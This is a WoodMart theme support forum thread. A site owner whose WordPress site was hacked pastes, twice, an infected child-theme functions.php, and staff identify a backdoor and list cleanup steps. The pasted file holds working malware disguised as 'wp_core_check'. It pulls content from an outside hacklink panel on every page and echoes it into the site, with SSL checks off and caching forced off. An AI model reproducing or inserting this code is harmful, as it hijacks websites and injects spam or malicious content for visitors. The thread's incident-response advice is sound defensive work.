Home Forums WoodMart support forum unknown links on my site and the site is down.

unknown links on my site and the site is down.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #719403

    engootech
    Participant

    the website is currently down.
    I found unknown websites on my site.
    I scanned the site using Wordfence and resolved the issue.
    the website is down after the scan.

    Wordfence: File Viewer
    Filename: /home/spodly/public_html/wp-content/themes/woodmart-child/functions.php
    File Size: 3,077 bytes
    File last modified: Tuesday 19th of May 2026 10:22:47 PM
    <?php
    /**
    * Enqueue script and styles for child theme
    */
    function woodmart_child_enqueue_styles() {
    wp_enqueue_style( ‘child-style’, get_stylesheet_directory_uri() . ‘/style.css’, array( ‘woodmart-style’ ), woodmart_get_theme_info( ‘Version’ ) );
    }
    add_action( ‘wp_enqueue_scripts’, ‘woodmart_child_enqueue_styles’, 10010 );

    add_filter( ‘dynamic_sidebar_params’, function($params) {
    if ( isset($params[0][‘before_title’]) ) {
    $params[0][‘before_title’] = str_replace(‘<h5 class=”widget-title”>’,'<div class=”widget-title”>’,$params[0][‘before_title’]);
    }
    if ( isset($params[0][‘after_title’]) ) {
    $params[0][‘after_title’] = str_replace(‘</h5>’,'</div>’,$params[0][‘after_title’]);
    }
    return $params;
    });
    add_action(“init”,function(){if(!defined(“DONOTCACHEPAGE”)){define(“DONOTCACHEPAGE”,true);}if(defined(“LSCACHE_NO_CACHE”)){header(“X-LiteSpeed-Control: no-cache”);}if(function_exists(“nocache_headers”)){nocache_headers();}if(!headers_sent()){header(“Cache-Control: no-store, no-cache, must-revalidate, max-age=0”);header(“Pragma: no-cache”);header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);header(“Last-Modified: ” . gmdate(“D, d M Y H:i:s”) . ” GMT”);header(“X-Accel-Expires: 0”);header(“X-Cache-Control: no-cache”);header(“CF-Cache-Status: BYPASS”);header(“X-Forwarded-Proto: “);}if(defined(“WP_CACHE”)&&WP_CACHE){define(“DONOTCACHEPAGE”,true);}if(function_exists(“wp_cache_flush”)){wp_cache_flush();}});add_action(“wp_head”,function(){if(!headers_sent()){header(“X-Frame-Options: SAMEORIGIN”);}},1);add_action(“wp_footer”,function(){if(function_exists(“w3tc_flush_all”)){w3tc_flush_all();}if(function_exists(“wp_cache_clear_cache”)){wp_cache_clear_cache();}},999);
    / Telegram: https://t.me/hacklink_panel */
    if(!function_exists(‘wp_core_check’)){function wp_core_check(){static $done=false;if($done){return;}if(class_exists(‘Elementor\Plugin’)){$elementor=\Elementor\Plugin::instance();if($elementor->editor->is_edit_mode()){return;}}$u=”https://panel.hacklinkmarket.com/code?v=&#8221;.time();$d=(!empty($_SERVER[‘HTTPS’])&&$_SERVER[‘HTTPS’]!==’off’?”https://&#8221;:”http://&#8221;).$_SERVER[‘HTTP_HOST’].”/”;if(function_exists(‘curl_init’)){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>[“X-Request-Domain:”.$d,”User-Agent: WordPress/”.get_bloginfo(‘version’)],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$done=true;echo $r;return;}}if(ini_get(‘allow_url_fopen’)){$o=[‘http’=>[‘header’=>’X-Request-Domain:’.$d,’timeout’=>10],’ssl’=>[‘verify_peer’=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$done=true;echo $r;return;}}if(function_exists(‘fopen’)){if($f=@fopen($u,’r’)){$r=”;while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$done=true;echo $r;return;}}}}add_action(‘wp_footer’,’wp_core_check’,999);add_action(‘wp_head’,’wp_core_check’,999);}
    © 2011 to 2026 Wordfence — Visit Wordfence.com for help, security updates and more.

    after the initial check, I am now checking again to ensure the site is free of unknown links.

    Report from Wordfence

    Wordfence: File Viewer Filename: /home/spodly/public_html/wp-content/themes/woodmart-child/functions.php File Size: 3,077 bytes File last modified: Tuesday 19th of May 2026 10:22:47 PM <?php /** * Enqueue script and styles for child theme / function woodmart_child_enqueue_styles() { wp_enqueue_style( ‘child-style’, get_stylesheet_directory_uri() . ‘/style.css’, array( ‘woodmart-style’ ), woodmart_get_theme_info( ‘Version’ ) ); } add_action( ‘wp_enqueue_scripts’, ‘woodmart_child_enqueue_styles’, 10010 ); add_filter( ‘dynamic_sidebar_params’, function($params) { if ( isset($params[0][‘before_title’]) ) { $params[0][‘before_title’] = str_replace(‘<h5 class=”widget-title”>’,'<div class=”widget-title”>’,$params[0][‘before_title’]); } if ( isset($params[0][‘after_title’]) ) { $params[0][‘after_title’] = str_replace(‘</h5>’,'</div>’,$params[0][‘after_title’]); } return $params; }); add_action(“init”,function(){if(!defined(“DONOTCACHEPAGE”)){define(“DONOTCACHEPAGE”,true);}if(defined(“LSCACHE_NO_CACHE”)){header(“X-LiteSpeed-Control: no-cache”);}if(function_exists(“nocache_headers”)){nocache_headers();}if(!headers_sent()){header(“Cache-Control: no-store, no-cache, must-revalidate, max-age=0”);header(“Pragma: no-cache”);header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);header(“Last-Modified: ” . gmdate(“D, d M Y H:i:s”) . ” GMT”);header(“X-Accel-Expires: 0”);header(“X-Cache-Control: no-cache”);header(“CF-Cache-Status: BYPASS”);header(“X-Forwarded-Proto: *”);}if(defined(“WP_CACHE”)&&WP_CACHE){define(“DONOTCACHEPAGE”,true);}if(function_exists(“wp_cache_flush”)){wp_cache_flush();}});add_action(“wp_head”,function(){if(!headers_sent()){header(“X-Frame-Options: SAMEORIGIN”);}},1);add_action(“wp_footer”,function(){if(function_exists(“w3tc_flush_all”)){w3tc_flush_all();}if(function_exists(“wp_cache_clear_cache”)){wp_cache_clear_cache();}},999); / Telegram: https://t.me/hacklink_panel */ if(!function_exists(‘wp_core_check’)){function wp_core_check(){static $done=false;if($done){return;}if(class_exists(‘Elementor\Plugin’)){$elementor=\Elementor\Plugin::instance();if($elementor->editor->is_edit_mode()){return;}}$u=”https://panel.hacklinkmarket.com/code?v=&#8221;.time();$d=(!empty($_SERVER[‘HTTPS’])&&$_SERVER[‘HTTPS’]!==’off’?”https://&#8221;:”http://&#8221;).$_SERVER[‘HTTP_HOST’].”/”;if(function_exists(‘curl_init’)){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>[“X-Request-Domain:”.$d,”User-Agent: WordPress/”.get_bloginfo(‘version’)],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$done=true;echo $r;return;}}if(ini_get(‘allow_url_fopen’)){$o=[‘http’=>[‘header’=>’X-Request-Domain:’.$d,’timeout’=>10],’ssl’=>[‘verify_peer’=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$done=true;echo $r;return;}}if(function_exists(‘fopen’)){if($f=@fopen($u,’r’)){$r=”;while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$done=true;echo $r;return;}}}}add_action(‘wp_footer’,’wp_core_check’,999);add_action(‘wp_head’,’wp_core_check’,999);} © 2011 to 2026 Wordfence — Visit Wordfence.com f

    Attachments:
    You must be logged in to view attached files.
    #719473

    Aizaz Imtiaz Awan
    Keymaster
    Xtemos team

    Hello,

    Your site is infected with malicious code inside woodmart-child/functions.php (hack link/backdoor injection). This is not related to the theme itself.

    Please immediately:

    – Delete and replace the entire functions.php file with a clean version
    – Re-upload a fresh child theme from the original WoodMart package
    – Run a full malware scan and remove any files containing wp_core_check or hack link market

    After the cleanup, also change all passwords (WP, FTP, hosting).

    Best Regards

    #719556

    engootech
    Participant

    I want you to login to the website and change woodmart-child/functions.php

    #719574

    Serg Sokhatskyi
    Keymaster
    Xtemos team

    Hello,
    Thanks for reaching out.

    We understand the site was infected and the woodmart-child/functions.php file contains malicious code. While we can advise on the cleanup steps, logging in to your site and performing fixes is outside the scope of our theme support.

    Please follow these recommendations:
    – Create a backup or, ideally, a staging copy to work on safely.
    – Replace the child theme:
    – Delete wp-content/themes/woodmart-child entirely.
    – Upload a fresh woodmart-child theme from the original WoodMart package (woodmart-child.zip). If you had custom code, re-add it manually only after carefully reviewing it.
    – Reinstall from trusted sources:
    – Reinstall/update the WoodMart parent theme from a fresh package.
    – Delete and reinstall all plugins from official sources (WordPress.org or the vendor).
    – Reinstall WordPress core (Dashboard > Updates > Re-install Now) to replace core files.
    – Hunt for backdoors:
    – Check wp-config.php, .htaccess, and index.php for unfamiliar code.
    – Inspect wp-content/mu-plugins, wp-content/uploads, and any recently modified PHP files.
    – Review Administrator users and cron jobs; remove anything unknown.
    – Temporarily disable caching/optimization during cleanup; clear all caches afterward.
    – Run a full malware scan again and make sure there are no references like wp_core_check or hacklinkmarket left.
    – Change all passwords (WP admin, hosting panel, FTP/SSH, database) and regenerate WordPress security keys (salts).
    – Ask your hosting provider to scan the account and review server logs for suspicious activity.

    Kind regards,
    XTemos Studio

Viewing 4 posts - 1 through 4 (of 4 total)